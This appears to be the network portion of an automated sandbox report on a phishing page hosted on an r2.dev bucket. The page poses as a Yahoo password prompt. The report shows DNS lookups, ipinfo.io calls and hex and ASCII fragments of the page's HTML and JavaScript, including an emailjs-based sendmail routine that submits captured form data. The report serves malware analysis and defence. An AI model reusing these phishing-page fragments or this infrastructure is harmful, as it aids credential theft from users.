                      Jul 5, 2024 00:31:37.160295010 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:37.160358906 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:37.160526991 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:38.386167049 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:38.386194944 CEST44349762142.250.185.68192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 5, 2024 00:30:22.201858044 CEST53531201.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:22.202452898 CEST53554791.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:23.460285902 CEST5011853192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:23.460525036 CEST5938253192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:23.668984890 CEST53501181.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:23.670499086 CEST53593821.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:24.023351908 CEST53522951.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:24.178613901 CEST5493653192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:24.178767920 CEST6331453192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:24.191406012 CEST53549361.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:24.197727919 CEST53633141.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:25.840464115 CEST5342153192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:25.841186047 CEST5991953192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:25.849801064 CEST6086853192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:25.850285053 CEST6151053192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:25.852605104 CEST53599191.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:25.857863903 CEST53548461.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:25.859561920 CEST53615101.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:26.554588079 CEST6074453192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:26.554825068 CEST5316753192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:26.564204931 CEST53607441.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:26.565787077 CEST53531671.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:26.689292908 CEST5099153192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:26.694890976 CEST5021053192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:26.700006008 CEST53509911.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:26.706546068 CEST53502101.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:27.207693100 CEST53534091.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:28.136018991 CEST6415853192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:28.136506081 CEST5632353192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:28.145071983 CEST53641581.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:28.145421028 CEST53563231.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:28.153994083 CEST5982653192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:28.154494047 CEST6323953192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:28.168262005 CEST53598261.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:28.168308973 CEST53632391.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:29.053884029 CEST5250453192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:29.054250956 CEST6433753192.168.2.41.1.1.1
                      Jul 5, 2024 00:30:29.062830925 CEST53525041.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:29.063410997 CEST53643371.1.1.1192.168.2.4
                      Jul 5, 2024 00:30:40.473534107 CEST138138192.168.2.4192.168.2.255
                      Jul 5, 2024 00:30:41.297642946 CEST53565481.1.1.1192.168.2.4
                      Jul 5, 2024 00:31:00.181734085 CEST53511981.1.1.1192.168.2.4
                      Jul 5, 2024 00:31:21.905016899 CEST53594521.1.1.1192.168.2.4
                      Jul 5, 2024 00:31:22.922852993 CEST53540601.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 5, 2024 00:30:23.460285902 CEST192.168.2.41.1.1.10xea3eStandard query (0)pub-431046b43b84431ea1b4a212cd34e302.r2.devA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:23.460525036 CEST192.168.2.41.1.1.10x8e97Standard query (0)pub-431046b43b84431ea1b4a212cd34e302.r2.dev65IN (0x0001)false
                      Jul 5, 2024 00:30:24.178613901 CEST192.168.2.41.1.1.10xc81dStandard query (0)pub-431046b43b84431ea1b4a212cd34e302.r2.devA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:24.178767920 CEST192.168.2.41.1.1.10x732fStandard query (0)pub-431046b43b84431ea1b4a212cd34e302.r2.dev65IN (0x0001)false
                      Jul 5, 2024 00:30:25.840464115 CEST192.168.2.41.1.1.10x412bStandard query (0)pro.fontawesome.comA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:25.841186047 CEST192.168.2.41.1.1.10x1a3fStandard query (0)pro.fontawesome.com65IN (0x0001)false
                      Jul 5, 2024 00:30:25.849801064 CEST192.168.2.41.1.1.10x9bcaStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:25.850285053 CEST192.168.2.41.1.1.10x35b2Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                      Jul 5, 2024 00:30:26.554588079 CEST192.168.2.41.1.1.10xf843Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:26.554825068 CEST192.168.2.41.1.1.10x30c2Standard query (0)www.google.com65IN (0x0001)false
                      Jul 5, 2024 00:30:26.689292908 CEST192.168.2.41.1.1.10x3805Standard query (0)logodownload.orgA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:26.694890976 CEST192.168.2.41.1.1.10x8f07Standard query (0)logodownload.org65IN (0x0001)false
                      Jul 5, 2024 00:30:28.136018991 CEST192.168.2.41.1.1.10x84b4Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:28.136506081 CEST192.168.2.41.1.1.10xef19Standard query (0)ipinfo.io65IN (0x0001)false
                      Jul 5, 2024 00:30:28.153994083 CEST192.168.2.41.1.1.10x36e8Standard query (0)logodownload.orgA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:28.154494047 CEST192.168.2.41.1.1.10xcbdStandard query (0)logodownload.org65IN (0x0001)false
                      Jul 5, 2024 00:30:29.053884029 CEST192.168.2.41.1.1.10x847cStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:29.054250956 CEST192.168.2.41.1.1.10x86bStandard query (0)ipinfo.io65IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 5, 2024 00:30:23.668984890 CEST1.1.1.1192.168.2.40xea3eNo error (0)pub-431046b43b84431ea1b4a212cd34e302.r2.dev104.18.2.35A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:23.668984890 CEST1.1.1.1192.168.2.40xea3eNo error (0)pub-431046b43b84431ea1b4a212cd34e302.r2.dev104.18.3.35A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:24.191406012 CEST1.1.1.1192.168.2.40xc81dNo error (0)pub-431046b43b84431ea1b4a212cd34e302.r2.dev104.18.2.35A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:24.191406012 CEST1.1.1.1192.168.2.40xc81dNo error (0)pub-431046b43b84431ea1b4a212cd34e302.r2.dev104.18.3.35A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:25.852174044 CEST1.1.1.1192.168.2.40x412bNo error (0)pro.fontawesome.compro.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:30:25.852605104 CEST1.1.1.1192.168.2.40x1a3fNo error (0)pro.fontawesome.compro.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:30:25.859132051 CEST1.1.1.1192.168.2.40x9bcaNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:30:25.859561920 CEST1.1.1.1192.168.2.40x35b2No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:30:26.564204931 CEST1.1.1.1192.168.2.40xf843No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:26.565787077 CEST1.1.1.1192.168.2.40x30c2No error (0)www.google.com65IN (0x0001)false
                      Jul 5, 2024 00:30:26.700006008 CEST1.1.1.1192.168.2.40x3805No error (0)logodownload.org104.26.7.17A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:26.700006008 CEST1.1.1.1192.168.2.40x3805No error (0)logodownload.org104.26.6.17A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:26.700006008 CEST1.1.1.1192.168.2.40x3805No error (0)logodownload.org172.67.71.13A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:26.706546068 CEST1.1.1.1192.168.2.40x8f07No error (0)logodownload.org65IN (0x0001)false
                      Jul 5, 2024 00:30:28.145071983 CEST1.1.1.1192.168.2.40x84b4No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:28.168262005 CEST1.1.1.1192.168.2.40x36e8No error (0)logodownload.org104.26.6.17A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:28.168262005 CEST1.1.1.1192.168.2.40x36e8No error (0)logodownload.org172.67.71.13A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:28.168262005 CEST1.1.1.1192.168.2.40x36e8No error (0)logodownload.org104.26.7.17A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:28.168308973 CEST1.1.1.1192.168.2.40xcbdNo error (0)logodownload.org65IN (0x0001)false
                      Jul 5, 2024 00:30:29.062830925 CEST1.1.1.1192.168.2.40x847cNo error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:38.545293093 CEST1.1.1.1192.168.2.40x324aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:30:38.545293093 CEST1.1.1.1192.168.2.40x324aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:30:56.464018106 CEST1.1.1.1192.168.2.40x4895No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:30:56.464018106 CEST1.1.1.1192.168.2.40x4895No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:31:15.304595947 CEST1.1.1.1192.168.2.40x1c39No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:31:15.304595947 CEST1.1.1.1192.168.2.40x1c39No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                      Jul 5, 2024 00:31:35.102454901 CEST1.1.1.1192.168.2.40x139cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Jul 5, 2024 00:31:35.102454901 CEST1.1.1.1192.168.2.40x139cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      • https:
                        • logodownload.org
                        • ipinfo.io
                      • fs.microsoft.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449736104.18.2.35808C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      Jul 5, 2024 00:30:23.681943893 CEST492OUTGET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jul 5, 2024 00:30:24.172616005 CEST548INHTTP/1.1 301 Moved Permanently
                      Date: Thu, 04 Jul 2024 22:30:24 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Thu, 04 Jul 2024 23:30:24 GMT
                      Location: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 89e28f40b91572a5-EWR
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jul 5, 2024 00:31:09.189459085 CEST6OUTData Raw: 00
                      Data Ascii:


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449737104.18.2.354438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:25 UTC720OUTGET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:25 UTC282INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:25 GMT
                      Content-Type: text/html
                      Content-Length: 5385
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "167c14212ab66c838da881e5faf380e1"
                      Last-Modified: Wed, 17 Apr 2024 14:47:29 GMT
                      Server: cloudflare
                      CF-RAY: 89e28f49d95e729f-EWR
                      2024-07-04 22:30:25 UTC1087INData Raw: 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74
                      Data Ascii: <!doctype html><html lang="en"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content
                      2024-07-04 22:30:25 UTC1369INData Raw: 68 72 65 66 3d 22 67 66 6f 72 6d 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 67 73 74 79 6c 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22
                      Data Ascii: href="gform.css" rel="stylesheet"> <link href="gstyles.css" rel="stylesheet"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"> </script> </head> <body class=""> <script type="text/javascript"
                      2024-07-04 22:30:25 UTC1369INData Raw: 2c 20 79 6f 75 20 67 65 74 20 6d 6f 72 65 20 6f 75 74 20 6f 66 20 6c 69 66 65 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 67 22 20 63 6c 61 73 73 3d 22 6c 6f 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 6f 64 6f 77 6e 6c 6f 61 64 2e 6f 72 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 39 2f 30 39 2f 79 61 68 6f 6f 2d 6c 6f 67 6f 2d 31 2e 70 6e 67 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 45 6e 74 65 72 20 70 61 73 73 77 6f 72 64 3c 2f 68 33 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 75 73 69 6e 67 20 79 6f 75 72 20 59 61
                      Data Ascii: , you get more out of life.</p> </div> <div id="log" class="log"> <img src="https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png"/> <h3>Enter password</h3> <p>using your Ya
                      2024-07-04 22:30:25 UTC1369INData Raw: 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 22 6a 73 6f 6e 22 20 73 68 6f 77 73 20 74 68 61 74 20 64 61 74 61 20 77 69 6c 6c 20 62 65 20 66 65 74 63 68 65 64 20 69 6e 20 6a 73 6f 6e 20 66 6f 72 6d 61 74 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 6d 61 69 6c 28 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6d 61 69 6c 6a 73 2e 69 6e 69 74 28 22 74 2d 6b 4b 58 6e 46 70 72 4c 55 39 36 46 56 6a 6f 22 29 3b 20 2f 2f 70 6c 65 61 73 65 20 65 6e 63 72 79 70 74 65 64 20 75 73 65 72 20 69 64 20 66 6f 72 20 6d 61 6c 69 63 69 6f 75 73 20 61 74 74 61 63 6b 73 0d 0a 20 20 20 20 20 20 20
                      Data Ascii: // "json" shows that data will be fetched in json format function sendmail(){ (function() { emailjs.init("t-kKXnFprLU96FVjo"); //please encrypted user id for malicious attacks
                      2024-07-04 22:30:25 UTC191INData Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 73 75 62 6d 69 74 22 2c 20 70 72 6f 63 65 73 73 46 6f 72 6d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 20 70 72 6f 63 65 73 73 46 6f 72 6d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: form.attachEvent("submit", processForm); } else { form.addEventListener("submit", processForm); } </script> </body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449741104.18.2.354438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:26 UTC628OUTGET /gform.css HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: text/css,*/*;q=0.1
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: style
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:26 UTC281INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:26 GMT
                      Content-Type: text/css
                      Content-Length: 1218
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "726ef0647391ed5efc9076bcdb91c606"
                      Last-Modified: Wed, 17 Apr 2024 14:47:29 GMT
                      Server: cloudflare
                      CF-RAY: 89e28f50292f4407-EWR
                      2024-07-04 22:30:26 UTC1218INData Raw: 69 6e 70 75 74 20 7b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0d 0a 20 20 7d 0d 0a 0d 0a 2e 69 6e 70 75 74 2d 66 69 65 6c 64 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 39 65 78 3b 0d 0a 20 20 7d 0d 0a 0d 0a 2e 69 6e 70 75 74 2d 66 69 65 6c 64 20 6c 61 62 65 6c 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 74 6f 70 3a
                      Data Ascii: input { -webkit-appearance: none; -moz-appearance: none; appearance: none; border-radius: 0; }.input-field { position: relative;text-align: left;margin-top: 9ex; }.input-field label { position: absolute; top:


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449740104.18.2.354438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:26 UTC630OUTGET /gstyles.css HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: text/css,*/*;q=0.1
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: style
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:26 UTC281INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:26 GMT
                      Content-Type: text/css
                      Content-Length: 1444
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "52ecf9bbf69e5bb6ea38c281c8de64df"
                      Last-Modified: Wed, 17 Apr 2024 14:47:29 GMT
                      Server: cloudflare
                      CF-RAY: 89e28f502ca98c6b-EWR
                      2024-07-04 22:30:26 UTC1369INData Raw: 2a 20 7b 20 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 0d 0a 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 0d 0a 7d 0d 0a 0d 0a 68 74 6d 6c 20 2c 20 62 6f 64 79 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 54 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 0d 0a 62 6f
                      Data Ascii: * { -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box; }html , body{ font-family: "Trebuchet MS", "Helvetica Neue", Helvetica, Arial, sans-serif; height: 100%; width: 100%;}bo
                      2024-07-04 22:30:26 UTC75INData Raw: 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 23 6c 6f 67 7b 0d 0a 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 7d
                      Data Ascii: ; } #log{ float: left; width: 100%; }}


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449746104.26.7.174438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:27 UTC646OUTGET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1
                      Host: logodownload.org
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
